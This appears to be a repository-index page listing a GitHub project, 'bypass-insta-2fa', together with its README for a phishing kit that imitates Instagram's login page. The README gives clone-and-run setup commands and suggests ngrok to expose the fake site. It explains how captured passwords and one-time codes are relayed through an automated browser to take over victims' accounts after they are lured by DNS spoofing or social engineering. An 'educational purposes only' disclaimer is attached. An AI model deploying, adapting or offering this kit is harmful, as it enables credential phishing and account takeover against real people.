https://github.com/swagkarna/bypass-insta-2fa-
Advance Phishing page which can bypass instagram 2FA
https://github.com/swagkarna/bypass-insta-2fa-
bypass-2fa kali-linux ngrok phishing
Last synced: 3 months ago
JSON representation
Advance Phishing page which can bypass instagram 2FA
- Host: GitHub
- URL: https://github.com/swagkarna/bypass-insta-2fa-
- Owner: swagkarna
- Created: 2020-01-28T22:23:36.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2022-07-21T01:08:36.000Z (almost 3 years ago)
- Last Synced: 2025-01-20T07:35:11.496Z (4 months ago)
- Topics: bypass-2fa, kali-linux, ngrok, phishing
- Language: HTML
- Size: 3.29 MB
- Stars: 93
- Watchers: 6
- Forks: 28
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# 2FAInstagram
## Disclaimer
This repository is meant for educational purposes only.
I'm not an expert developer, the code will be improved in futher versions.
## Description
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user.
This repository aims at demonstrating how the attackers can bypass 2FA for instagram's authentication system. In this case, the two factors are password and a code sent to mobile user._
## Requirements
- [Apache2](https://www.apache.org/)
- [Python](https://www.python.org/)
- [Selenium](https://www.seleniumhq.org/)
## How to run
```
git clone https://github.com/swagkarna/Bypass-Insta-2FA-.git
cd Bypass-Insta-2FA-
pip install -r requirements.txt
chmod +x run.sh
chmod +x geckodriver
sudo ./run.sh
```
All the codes will be saved in codes.txt file . You must delete code.txt file for capturing new users.
You can use Ngrok to use outside the wan. Type this command on your terminal
./ngrok http 80
````
rm /var/www/html/instagram/code.txt
```
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in instagram to fake instagram web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original instagram to log in with victim's credentials. This will cause instagram send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original instagram web, gaining the access to the victim account._
## POC
. Special Thanks to Alejandro Fernandez